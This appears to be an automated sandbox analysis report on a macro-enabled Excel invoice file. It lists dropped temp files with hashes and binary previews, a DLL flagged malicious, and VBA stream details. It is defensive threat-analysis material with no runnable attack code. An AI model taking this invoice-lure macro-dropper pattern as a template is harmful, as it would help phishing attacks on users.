                                                                                                  Preview: V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.4.8.9.1.8.4.8.0.9.8.9.4.3.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.5.4.8.9.1.8.6.5.3.5.2.5.7.4.2.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.f.0.0.a.a.1.e.-.5.4.7.d.-.1.1.e.b.-.a.d.c.f.-.e.c.f.4.b.b.b.5.9.1.5.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.f.0.0.a.a.1.d.-.5.4.7.d.-.1.1.e.b.-.a.d.c.f.-.e.c.f.4.b.b.b.5.9.1.5.b.....R.e.s.p.o.n.s.e...B.u.c.k.e.t.I.d.=.3.7.0.1.1.5.9.2.6.1.....R.e.s.p.o.n.s.e...B.u.c.k.e.t.T.a.b.l.e.=.3.8.0.7.0.7.5.2.5.....R.e.s.p.o.n.s.e...t.y.p.e.=.4.....S.i.g.[.0.]...N.a.m.e.=.A.p.p.l.i.c.a.t.i.o.n. .N.a.m.e.....S.i.g.[.0.]...V.a.l.u.e.=.E.X.C.E.L...E.X.E.....S.i.g.[.1.]...N.a.m.e.=.A.p.p.l.i.c.a.t.i.o.n. .V.e.r.s.i.o.n.....S.i.g.[.1.]...V.a.l.u.e.=.1.4...0...7.0.1.5...1.0.0.0.....S.i.g.[.2.]...N.a.m.e.=.A.p.p.l.i.c.a.t.i.o.n. .T.i.m.e.s.t.a.m.p.....S.i.g.[.2.]...V.a.l.u.e.=.5.1.c.c.a.7.c.d.....S.i.g.[.3.]...N.a.m.
                                                                                                  C:\Users\user\AppData\Local\Temp\999482.cvr
                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1392
                                                                                                  Entropy (8bit):3.1414186734449734
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:L3ll/WXnmvss1FwkDTHbMxl/OYCk7HRHE/fhJqDTVjD21GFPytk7LVlU/hCvZGQJ:L3ll/WcLLnT7rYC2Hy37kpK09J3ghyQ6
                                                                                                  MD5:D487E3A8E8F3533A231E763607E71789
                                                                                                  SHA1:1D2A4EDD2D2E19BB7BF9FAA2BEE7C45EBA32CA17
                                                                                                  SHA-256:80C789A5378A63C5BD02ED7FEE2AD45779A03EA48F7FCDE4AA42D94F302468EE
                                                                                                  SHA-512:6F1CC897DBE34A0C15D1FA7FBE8F703447C1029ED4D68ECC7A1089C1C32DDE3ABD4D6B9E32E2223E2BB63FCA526FB6D071EC46D554055C6F864B39F57C567000
                                                                                                  Malicious:false
                                                                                                  Preview: MSQMx......../*.................g..............................P....................................................................................d......EXCE........................................5...g.......;...........<...........A...........l...........................z...............................................................................................................$...........Q...................................2...b.......+...N...................~I..C...........F...........Q...........W.......`)...........)..............................................................+...........0...........:...........;...............................................................................8...........8.... ..........:!......3...n"...........".......)...".......)...".......)...".......)...".......)...".......)..7#..........?.......8...........8.......~...............$.......<...B............(../....................I../.......................$...$............(..n370.....I..
                                                                                                  C:\Users\user\AppData\Local\Temp\BAFE0000
                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):58709
                                                                                                  Entropy (8bit):7.859190343855389
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:hJ8RzggbLmCf6646CIKJLo3cBQglVigvKVIg6CsLNFA/:hq1rmCM2bsWglkgiGgh+A/
                                                                                                  MD5:27446CDB83A36188F9AFD0931C4312CE
                                                                                                  SHA1:8B715CB8611B59CDCB2B7AE94B0F257BC5AF914D
                                                                                                  SHA-256:5679BB5677F42123A82F5864C016D4423C0F58F522653567EC537D7BA3A740BC
                                                                                                  SHA-512:D714CF329241F1DD1E879A9E7DF0D70BBDF0AD1459CA1CFF0AD58E32621558D7CAD0C842542C76F978FF415D72351C30E1865D17C0520AC799C88350D9F8B669
                                                                                                  Malicious:false
                                                                                                  Preview: ...n.0.E.......H...(,g..6@S.[......(..w(9...a....u..q...........+R..N*....o.gR....Y..."....~<z...m..>%...(.`x..........\..........&..L.l.wP.'.......l.%........^+.....+/ ..k%@:.d.F....HFS....OH.....2..]0..1....0...-..&......|_;.....W>~......x..u.n.....+.....*(.....;7..Y.....s.:.e..XB+@..3R.Ep..o5..W...#...N.Yw.Y.|U.`rBK)o.dz..g.H.{...k........t.....4.m...3d...N..?.........N.k.....DO....A..b...-.....D.....q..8..,../#..K.F.......3...r..q... ..;.6........PK..........!.........*.......[Content_Types].xml ...(...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                  C:\Users\user\AppData\Local\Temp\CabF595.tmp
                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                  File Type:Microsoft Cabinet archive data, 58936 bytes, 1 file
                                                                                                  Category:dropped
                                                                                                  Size (bytes):58936
                                                                                                  Entropy (8bit):7.994797855729196
                                                                                                  Encrypted:true
                                                                                                  SSDEEP:768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
                                                                                                  MD5:E4F1E21910443409E81E5B55DC8DE774
                                                                                                  SHA1:EC0885660BD216D0CDD5E6762B2F595376995BD0
                                                                                                  SHA-256:CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
                                                                                                  SHA-512:2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
                                                                                                  Malicious:false
                                                                                                  Preview: MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..*D..agaV..2.|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....|.....Q...'....X..C.....a;.*..Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........
                                                                                                  C:\Users\user\AppData\Local\Temp\Excel8.0\MSForms.exd
                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):241332
                                                                                                  Entropy (8bit):4.206796464521107
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:cGvLEQNSk8SCtKBX0Gpb2vxKHnVMOkOX0mRO/NIAIQK7viKAJYsA0ppDCLTfMRsi:cyNNSk8DtKBrpb2vxrOpprf/nVq
                                                                                                  MD5:A4DEDE8EF4F9EC70400498956CA748C0
                                                                                                  SHA1:7B67BBFBFC94993D76B24DCC123897888DC96050
                                                                                                  SHA-256:209DEDBBB8D3FDB651CFB687D9EF8CCC82235564F7DF9524A2A111D2E9962B41
                                                                                                  SHA-512:414507D5943B425CCB0A47E829DE21484982510EAEEE464F417F8D692340598CEC848A739E3DA94D150DB74347D1DC13FBF8A98D6F74D9A0A7C24639456B160E
                                                                                                  Malicious:false
                                                                                                  Preview: MSFT................Q................................$......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0*...*...*..\+...+..$,...,...,..P-...-......|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8.......8..............................H...4............................................................................x...I..............T............ ..P........................... ...........................................................&!..............................................................................................
                                                                                                  C:\Users\user\AppData\Local\Temp\TarF596.tmp
                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):152533
                                                                                                  Entropy (8bit):6.31602258454967
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:SIPLlYy2pRSjgCyrYBb5HQop4Ydm6CWku2PtIz0jD1rfJs42t6WP:S4LIpRScCy+fdmcku2PagwQA
                                                                                                  MD5:D0682A3C344DFC62FB18D5A539F81F61
                                                                                                  SHA1:09D3E9B899785DA377DF2518C6175D70CCF9DA33
                                                                                                  SHA-256:4788F7F15DE8063BB3B2547AF1BD9CDBD0596359550E53EC98E532B2ADB5EC5A
                                                                                                  SHA-512:0E884D65C738879C7038C8FB592F53DD515E630AEACC9D9E5F9013606364F092ACF7D832E1A8DAC86A1F0B0E906B2302EE3A840A503654F2B39A65B2FEA04EC3
                                                                                                  Malicious:false
                                                                                                  Preview: 0..S...*.H.........S.0..S....1.0...`.H.e......0..C...+.....7.....C.0..C.0...+.....7.............201012214904Z0...+......0..C.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                                                                                                  C:\Users\user\AppData\Local\Temp\WERF93D.tmp.WERInternalMetadata.xml
                                                                                                  Process:C:\Windows\System32\DWWIN.EXE
                                                                                                  File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):3110
                                                                                                  Entropy (8bit):3.6868931751016576
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:Shz4tU6o7VxBt3uhhgHPe40PAn5xp3c23:Wl7LBNuhhgG45nv5Z
                                                                                                  MD5:85B66140249D3D03E3A8C7CC888DC611
                                                                                                  SHA1:095501094FFBF87D7707F9F6BCAE169A768051A8
                                                                                                  SHA-256:989763C14AA678CECD13FCE9F4F19FE2C429A606407C295CAF2033F12F93E855
                                                                                                  SHA-512:CAC387185710204C23D1F59F9921712C9BD738A6B33878B576FF3A5DA8D8B7B4F361D693554649BA368733D5A749935CAC48A1BB6631A0FE5A72008663A2F429
                                                                                                  Malicious:false
                                                                                                  Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.6...1.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.7.6.0.1. .S.e.r.v.i.c.e. .P.a.c.k. .1.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .7. .P.r.o.f.e.s.s.i.o.n.a.l.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.7.6.0.1...2.3.6.7.7...a.m.d.6.4.f.r.e...w.i.n.7.s.p.1._.l.d.r...1.7.0.2.0.9.-.0.6.0.0.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.1.3.0.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.a.r.e.n.t.P.r.o.c.e.s.s.I.
                                                                                                  C:\Users\user\AppData\Local\Temp\jczxic.dll
                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):318976
                                                                                                  Entropy (8bit):7.117750209248663
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6144:ZH9O040SSrnmrwc4oU2FmrEaoGAC+Y5H2V3B918juwN:x9O02Srnh0qEJC+Y218jdN
                                                                                                  MD5:D3822DAB21FE64DD3695220DB7F46BED
                                                                                                  SHA1:C21D6B44020BD678970FDB0FAF3BE4CB984EA663
                                                                                                  SHA-256:2A4481F10B4459EA382A05F9DB4BA9922B313418DF5380CEB44C3DD5B5B8A459
                                                                                                  SHA-512:B28AD644D0F9F0849CAFC6C98B184A0A4B074D65EAA9A53CD9BD6A40706C0BFAC707D6279181080B4B74607BDEEDC8AE266FD902651C72CE54B30F91FE4DD3E2
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                  • Antivirus: ReversingLabs, Detection: 37%
                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...`z._...........!...2.z...`.......&.......@...............................@..........................................................|....................0..(....................................................................................text....$.......&.................. ..`.rdata.......@.......*..............@..@.rdata3......P.......,..............@..@.2...........`.......0..............@..@.rdata2......p.......2..............@..@.data...H............4..............@....text4...R.......T...P.............. ..@.rsrc...|........0..................@..@.reloc..(....0......................@..B........................................................................................................................................................................................................................................................................
                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Excel\~ar1015.xar
                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                  File Type:data
                                                                                                  Category:modified
                                                                                                  Size (bytes):52960
                                                                                                  Entropy (8bit):7.830566857790484
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:pYY8bhTwDBL8lJoJgT6RtBuzgN49fQ0VyT+hCiY+K0/uH8n9QjU205LEd29WNJ4X:Al8Dh88A9YWa+/28nv5LkJ4RVTQtA
                                                                                                  MD5:68E02E95565C5A77884EACD24973874C
                                                                                                  SHA1:A51F0323998206DB743A76F0D456228979B37B34
                                                                                                  SHA-256:C0957F3FFB7218EA01787915F47DD1F78BB65E2BC280600A3FAC00B0D4883C6C
                                                                                                  SHA-512:4979413DF0CBB95DD738E0DA1CE23941F90DA913191FB0340B335735097B180464219E89C5202515914718D794E00396338F82C0DA0CEE60E401B591CB1350A4
                                                                                                  Malicious:false
                                                                                                  Preview: .V...0..W.? ..v....B...J=.].[.W...w.m.^..}.@......%..{o<o<...UR....<].U...FH.......i...).!O......7..... Z.<=.`?R...J..q.0.d.o.Z......j..r....n77P.G........N.O.{Q*O..Jr.0PZiAJ.A.A........I.3.....+.Y. .....,c|..0..b.Qgqe..@......\e...Ad.U....d.(..<..I\.o/0S...0..D...o.{.2..}..rR@r.\..J...6f4.x.\...x.|}F.hK...P/.B\...'...{x.VN.y.......<.@..5....e...+.*.../q.EL..:........=...q....u.D.w.H...].....L...........x.....u.,6.....T.....s.1ai.cw........1n.Hl=.C..O..&EDg......Y1t.O.8....&..a-@.h...`........PK..........!...>,....].......[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Tue Jan 12 01:23:52 2021, atime=Tue Jan 12 01:23:52 2021, length=12288, window=hide
                                                                                                  Category:dropped
                                                                                                  Size (bytes):867
                                                                                                  Entropy (8bit):4.486167536091358
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12:85QHLgXg/XAlCPCHaXgzB8IB/S0EGIX+WnicvbSR9bDtZ3YilMMEpxRljKt2TdJU:85I/XTwz6I4XYe6Dv3qlrNru/
                                                                                                  MD5:F7E459936081BAE2BFF437D185DD2238
                                                                                                  SHA1:8AC2A890DDEA0C0A1BCAF0D0CDB9CD5598617F03
                                                                                                  SHA-256:49EF0D9F3556774A2D6132747C04715E36576A6B1B5B4A4BD1CFCCD9BD914B49
                                                                                                  SHA-512:835F99DCCA9B00698557F69FBCE59936C7CCFC4F927572D3CCC263A74226BFD3CC3CBC5F354D6DE0918EFBCF33FC5413603104BFABFCD5198FFBDBF42E4EC4F5
                                                                                                  Malicious:false
                                                                                                  Preview: L..................F...........7G..OP......OP.......0......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1.....,R....Desktop.d......QK.X,R..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\287400\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......287400..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\INV3867196801-20210111675616.LNK
                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:13 2020, mtime=Tue Jan 12 01:23:52 2021, atime=Tue Jan 12 01:24:00 2021, length=58717, window=hide
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2218
                                                                                                  Entropy (8bit):4.492922647779869
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:8kZ/XT3IkpXVZolQh2kZ/XT3IkpXVZolQ/:8kZ/XLIkKlQh2kZ/XLIkKlQ/
                                                                                                  MD5:FA32AB9DD1C661745A5537A316241E67
                                                                                                  SHA1:A4272182DDF9E38B361009F22134251F643CF0F3
                                                                                                  SHA-256:ABD0B35DE010BEAA8C207EA2C563444FC20A8CF2A969B7E068F49834D3D3730B
                                                                                                  SHA-512:DC274041010A068C4D62F30F912452AA5A32E538CED5FDB47BDC151DCDEBAABECFC0141718EDCF38BDE22FA30D8B638555F86AED3B85AD8CF21B456E6EEE2CD8
                                                                                                  Malicious:false
                                                                                                  Preview: L..................F.... ....0H..{..OP..............]............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.&...,R.. .INV386~1.XLS..p.......Q.y.Q.y*...8.....................I.N.V.3.8.6.7.1.9.6.8.0.1.-.2.0.2.1.0.1.1.1.6.7.5.6.1.6...x.l.s.m.......................-...8...[............?J......C:\Users\..#...................\\287400\Users.user\Desktop\INV3867196801-20210111675616.xlsm.8.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.I.N.V.3.8.6.7.1.9.6.8.0.1.-.2.0.2.1.0.1.1.1.6.7.5.6.1.6...x.l.s.m.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6....
                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):139
                                                                                                  Entropy (8bit):4.44676615805086
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:oyBVomxWnnLVbMGTMDo0LVbMGTMDomxWnnLVbMGTMDov:djUnL9HMDj9HMDUnL9HMDy
                                                                                                  MD5:7BDE403314C2DFC751ABEB6F21D98870
                                                                                                  SHA1:C35A06AC1FB6EE04D61CAFE692FBB41DE8F00555
                                                                                                  SHA-256:89B8240C12C7E618F92BC18563B0465D01B74AD3A74E4D326CFCFA0C3AE388BF
                                                                                                  SHA-512:994354197B5E116F4F7F382834F27B7ABB374B3C49272B71F0C5479D34098A7F7DC434270667D11461058B15FF79DD770370542B45652B288BAECA6D733EFCA6
                                                                                                  Malicious:false
                                                                                                  Preview: Desktop.LNK=0..[misc]..INV3867196801-20210111675616.LNK=0..INV3867196801-20210111675616.LNK=0..[misc]..INV3867196801-20210111675616.LNK=0..
                                                                                                  C:\Users\user\Desktop\D40F0000
                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):58717
                                                                                                  Entropy (8bit):7.859020639850848
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:hJ8RzggbLmCf6646CIKcOjIc4FNtD6c5243weY4BsiEasLNFqfeY:hq1rmCM21OjI9XYqIa+YeY
                                                                                                  MD5:4BD66B3DBF422C148D3B432E77A59D02
                                                                                                  SHA1:6F5CE68CF0948D76D20F1CCFE9AF5A2326547F90
                                                                                                  SHA-256:ED8C78B44981F72002455AD4281608E055B0654031C6788E43DB839AB1641D42
                                                                                                  SHA-512:516417878F9710C72B332A774A7B92A67A8329305506009A9BC9C67FD9A2E9AC30114D437F7B8F6FE0B97FAE03147EB228B5B0AE3AEC14A77FFD47D59FBE1681
                                                                                                  Malicious:false
                                                                                                  Preview: ...n.0.E.......H...(,g..6@S.[......(..w(9...a....u..q...........+R..N*....o.gR....Y..."....~<z...m..>%...(.`x..........\..........&..L.l.wP.'.......l.%........^+.....+/ ..k%@:.d.F....HFS....OH.....2..]0..1....0...-..&......|_;.....W>~......x..u.n.....+.....*(.....;7..Y.....s.:.e..XB+@..3R.Ep..o5..W...#...N.Yw.Y.|U.`rBK)o.dz..g.H.{...k........t.....4.m...3d...N..?.........N.k.....DO....A..b...-.....D.....q..8..,../#..K.F.......3...r..q... ..;.6........PK..........!.........*.......[Content_Types].xml ...(...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                  C:\Users\user\Desktop\~$INV3867196801-20210111675616.xlsm
                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):330
                                                                                                  Entropy (8bit):1.4377382811115937
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                                                                                                  MD5:96114D75E30EBD26B572C1FC83D1D02E
                                                                                                  SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                                                                                                  SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                                                                                                  SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                                                                                                  Malicious:true
                                                                                                  Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                                  Static File Info

                                                                                                  General

                                                                                                  File type:Microsoft Excel 2007+
                                                                                                  Entropy (8bit):7.77272893585129
                                                                                                  TrID:
                                                                                                  • Excel Microsoft Office Open XML Format document with Macro (57504/1) 54.50%
                                                                                                  • Excel Microsoft Office Open XML Format document (40004/1) 37.92%
                                                                                                  • ZIP compressed archive (8000/1) 7.58%
                                                                                                  File name:INV3867196801-20210111675616.xlsm
                                                                                                  File size:42039
                                                                                                  MD5:9b7c2b0abf5478ef9a23d9a9e87c7835
                                                                                                  SHA1:6931c4b845a8a952699d9cf85b316e3b3d826a41
                                                                                                  SHA256:a463f9a8842a5c947abaa2bff1b621835ff35f65f9d3272bf1fa5197df9f07d0
                                                                                                  SHA512:4c92f1fdbd83eb8e38e93800d2620c328ac59de4d5cdef9e8fbbcfc02fe715f110db49a83880ef0726fb1224d140472abf341b22fa7710710a69f061aa880840
                                                                                                  SSDEEP:768:IHT0FIYwYlKUOaSqlRgzxTLKLls5QlHbdYoVq+:uYwQKUOVqlRgzxTOLpZYAq+
                                                                                                  File Content Preview:PK..........!.o.m.....*.......[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                                                                  File Icon

                                                                                                  Icon Hash:e4e2aa8aa4bcbcac

                                                                                                  Static OLE Info

                                                                                                  General

                                                                                                  Document Type:OpenXML
                                                                                                  Number of OLE Files:2

                                                                                                  OLE File "/opt/package/joesandbox/database/analysis/338155/sample/INV3867196801-20210111675616.xlsm"

                                                                                                  Indicators

                                                                                                  Has Summary Info:False
                                                                                                  Application Name:unknown
                                                                                                  Encrypted Document:False
                                                                                                  Contains Word Document Stream:
                                                                                                  Contains Workbook/Book Stream:
                                                                                                  Contains PowerPoint Document Stream:
                                                                                                  Contains Visio Document Stream:
                                                                                                  Contains ObjectPool Stream:
                                                                                                  Flash Objects Count:
                                                                                                  Contains VBA Macros:True

                                                                                                  Summary

                                                                                                  Author:
                                                                                                  Last Saved By:
                                                                                                  Create Time:2020-12-07T14:38:21Z
                                                                                                  Last Saved Time:2021-01-11T14:32:26Z
                                                                                                  Creating Application:Microsoft Excel
                                                                                                  Security:0

                                                                                                  Document Summary

                                                                                                  Thumbnail Scaling Desired:false
                                                                                                  Company:
                                                                                                  Contains Dirty Links:false
                                                                                                  Shared Document:false
                                                                                                  Changed Hyperlinks:false
                                                                                                  Application Version:16.0300

                                                                                                  Streams with VBA

                                                                                                  VBA File Name: Module1.bas, Stream Size: 3215
                                                                                                  General
                                                                                                  Stream Path:VBA/Module1
                                                                                                  VBA File Name:Module1.bas
                                                                                                  Stream Size:3215
                                                                                                  Data ASCII:. . . . . . . . . * . . . . . . . . . . . . . . . X . . . . . . . . . . . . . . . . x . & . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                  Data Raw:01 16 03 00 03 f0 00 00 00 2a 05 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff 58 05 00 00 f0 09 00 00 00 00 00 00 01 00 00 00 ba 78 ca 26 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 08 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                  VBA Code Keywords

                                                                                                  Keyword
                                                                                                  Integer:
                                                                                                  bycilke()
                                                                                                  VB_Name
                                                                                                  MiV(sem.value)
